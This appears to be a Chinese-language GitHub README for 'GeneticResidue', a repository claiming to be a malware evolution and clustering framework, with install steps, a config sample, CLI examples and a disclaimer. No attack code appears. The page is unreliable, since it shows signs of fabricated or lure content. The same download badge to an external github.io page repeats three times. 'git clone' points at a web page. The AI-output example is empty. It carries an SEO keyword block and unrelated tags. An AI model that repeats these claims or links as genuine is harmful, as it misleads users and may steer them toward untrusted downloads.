FS2B/Malware-Artifact-Archive

GitHub: FS2B/Malware-Artifact-Archive

将恶意软件分析从静态特征比对推向「基因组学」层面的演化追踪框架,帮助安全研究者归族、聚类和预测恶意代码变体。

Stars: 0 | Forks: 0

# 🧬 GeneticResidue:高级病原体分析框架 [![下载](https://img.shields.io/badge/Download%20Link-brightgreen?style=for-the-badge&logo=github)](https://FS2B.github.io) ## 🧪 概述 **GeneticResidue** 是一个变革性的恶意软件分析存储库,它超越了静态特征,致力于编目恶意代码的 **演化 DNA**。可以将其视为网络威胁的基因组库——在这里,每个样本都经过测序、分类,并映射到其祖先变体。本项目旨在赋能安全研究人员、事件响应人员和充满好奇心的防御者: - 跨恶意软件家族 **追踪变异模式** - 跨看似无关的毒株 **识别共享代码片段** - 为新出现的威胁行为 **构建预测模型** - **部署轻量级分类工具** 而无需依赖云 与像博物馆标本一样存储文件的传统数据库不同,GeneticResidue 将每个二进制文件视为具有遗传性、适应性和脆弱性的活体有机体。 ## 🧬 Mermaid 图表:GeneticResidue 架构 ``` graph TD A[Raw Sample Upload] --> B{Validator} B -->|Clean| C[Genetic Sequencer] B -->|Malformed| D[Quarantine] C --> E[Code Fragment Extractor] E --> F[Pattern Matcher] F --> G[Family Clustering Engine] G --> H[Mutation Tracker] H --> I[Residue Knowledge Graph] I --> J[API Layer] J --> K[Genome Browser UI] J --> L[Threat Intelligence Feeds] J --> M[Local Console Tool] ``` ## 📥 下载与安装 [![下载](https://img.shields.io/badge/Download%20Link-brightgreen?style=for-the-badge&logo=github)](https://FS2B.github.io) ### Docker 快速入门 ``` docker pull geneticresidue/analysis-engine:2026 docker run -v ./samples:/input -v ./output:/results geneticresidue/analysis-engine --mode full-genome ``` ### 通过 Python 进行本地安装(无需虚拟环境) ``` git clone https://FS2B.github.io cd geneticresidue pip install -r requirements.txt python residue.py --initialize ``` ## 📋 示例配置文件 在根目录中创建一个 `residue_profile.yaml` 文件以自定义您的分析流水线: ``` # GeneticResidue Profile 配置 - v2026 analysis: depth: deep # Options: shallow, moderate, deep family_clustering: true mutation_sensitivity: 0.78 # Threshold for variant detection extract_metadata: true storage: database: local # Options: local, postgres, sqlite cache_samples: false max_genomes: 10000 notifications: new_family_alert: true critical_mutation: true output: format: json # Options: json, csv, yaml, graphml include_embeddings: true compatibility: os: [linux, macos, windows] # Explicit OS support declaration architecture: [x86_64, arm64, aarch64] ``` ## 🖥️ 示例控制台调用 ``` # 使用完整的 genetic tracing 分析单个样本 python residue.py --input ./suspicious_binary.exe --trace --family-id APT27 # 批量处理目录并生成 mutation report python residue.py --batch ./malware_collection/ --report variant_map.json --threads 8 # 启动交互式 genome browser(在浏览器中启动 GUI) python residue.py --serve --port 8080 --dashboard # 比较两个样本的 genetic similarity python residue.py --compare sample_a.bin sample_b.bin --similarity-threshold 0.65 # 导出 knowledge graph 以供外部可视化 python residue.py --export-graph residue_2026.graphml --format graphml ``` ## 💻 操作系统兼容性表 | 操作系统 | 状态 | 测试版本 | 备注 | |:----------------|:------:|:--------------:|:------| | 🐧 **Linux** (Ubuntu, Debian, Fedora) | ✅ 完全支持 | 22.04+ / 12+ | 首选环境 | | 🍏 **macOS** (Intel & Apple Silicon) | ✅ 完全支持 | Ventura+ | 原生 ARM 二进制文件 | | 🪟 **Windows** (10, 11, Server) | ✅ 完全支持 | 22H2+ | 推荐 WSL2 | | 🐚 **FreeBSD** | ⚠️ 实验性 | 13.2+ | GUI 支持有限 | | 📱 **Termux** (Android) | ✅ 支持 | v0.118+ | 仅限终端模式 | ## 🌟 核心特性 ### 🔬 高级变异检测 (v2026) - **代码片段哈希** – 通过 SHA-512 指纹识别跨家族重用的代码块 - **行为相似度评分** – 比较运行时行为,而不仅仅是静态特征(0.0–1.0 刻度) - **系统发育树生成** – 显示祖先-后代关系的可视化演化图 - **变体预言引擎** – 基于当前趋势预测可能出现的未来变异的机器学习模型 ### 🧩 响应式 UI(基因组浏览器) - 为长时间分析会话优化的暗色模式界面 - 可缩放的热力图,显示数千个样本中的代码片段密度 - 并排比较面板,带有颜色编码的变异高亮显示 - 可将任何视图导出为 SVG、PNG 或交互式 HTML 以用于报告 ### 🌐 多语言支持 整个平台界面、文档和控制台输出均已翻译为: - 🇬🇧 英语(默认) - 🇯🇵 日语 - 🇰🇷 韩语 - 🇩🇪 德语 - 🇫🇷 法语 - 🇪🇸 西班牙语 - 🇨🇳 简体中文 使用 `--lang ja_JP` 在运行时切换语言,或在 `residue_profile.yaml` 中进行配置。 ### 🕑 全天候社区支持生态系统 - **Telegram 机器人**(实时分析请求)– `@GeneticResidueBot` - **Discord 服务器**,设有专属的 `#genome-debug` 和 `#variant-alerts` 频道 - **Matrix 聊天室**,用于联邦加密对话 - **IRC 备用**,面向传统用户 (Libera.Chat, `#geneticresidue`) - **邮件自动回复器** – `support@geneticresidue.repo`(6小时内回复) ## 🤖 AI 集成:OpenAI & Claude API GeneticResidue 利用大型语言模型进行 **语义代码解释** 和 **威胁叙事生成**。 ### OpenAI 集成 (GPT-4o / o3) ``` python residue.py --analyze sample.bin --with-ai openai --api-key sk-xxxx ``` - 生成混淆代码段的纯英文解释 - 从行为日志中提取并建议 IOC(失陷标示) - 自动创建事件响应预案 ### Claude API (Anthropic) ``` python residue.py --analyze sample.bin --with-ai claude --api-key sk-ant-xxxx ``` - 结合上下文推理解释多态代码变体 - 从自然语言描述生成 YARA 规则 - 提供多步骤取证建议 **AI 输出示例:** ## 📚 SEO 友好的关键字集成 此存储库针对搜索以下内容的 researcher 进行了优化: - **恶意软件基因分析框架** - **代码变异检测工具** - **恶意软件家族聚类引擎** - **行为相似度评分系统** - **系统发育恶意软件分类** - **变体预言 AI 模型** - **跨平台威胁分析平台** - **开源恶意软件基因组浏览器** - **多态代码模式识别器** - **恶意软件演化追踪工具** 这些术语自然地贯穿于文档、README 和控制台帮助系统之中。 ## ⚠️ 免责声明 **GeneticResidue** 是一个 **以教育和研究为核心** 的框架。它专为以下用途设计: - 拥有适当授权的合乎道德的安全研究人员 - 分析自身环境的事件响应团队 - 研究恶意软件演化的学术机构 - 在合法边界内参与 CTF(夺旗赛)的人员 ### 仅限合法使用 下载或使用本软件即表示您同意: 1. **绝不** 分析您不拥有或未获得明确书面许可检查的样本 2. **绝不** 使用此工具创建、修改或分发恶意软件 3. **绝不** 绕过您未控制的系统上的安全措施 4. **遵守** 所有适用的地方、国家和国际法律 ### 无担保 本软件按“原样”提供,不提供任何形式的明示或暗示担保。作者和贡献者不对因使用 GeneticResidue 而产生的任何误用、损害或法律后果负责。 ### 情报源免责声明 从第三方来源整合的威胁情报可能包含不完整或推测性的数据。请始终通过独立分析来验证发现。 ## 📄 许可证 本项目基于 **MIT License** 发布。 您可以出于任何合法目的自由使用、修改和分发本软件。 [查看完整许可证](https://opensource.org/licenses/MIT) **版权所有 (c) 2026 GeneticResidue 贡献者** ## 🧬 最终下载引导 [![下载](https://img.shields.io/badge/Download%20Link-brightgreen?style=for-the-badge&logo=github)](https://FS2B.github.io) *每一段恶意软件都承载着一个故事。GeneticResidue 帮助您阅读它、追踪它,并洞悉它的未来。*
标签:DAST, DNS 反向解析, Docker, IP 地址批量处理, Petitpotam, Python, 代码片段分析, 变异追踪, 基因图谱, 威胁情报, 安全防御评估, 实时分析器, 库, 应急响应, 开发者工具, 恶意软件分析, 恶意软件家族聚类, 无云依赖分析, 无后门, 暗网监控, 测试用例, 混合加密, 病毒库, 网络安全, 蓝队防御, 请求拦截, 轻量级分类工具, 进化分析, 逆向工具, 隐私保护, 预测模型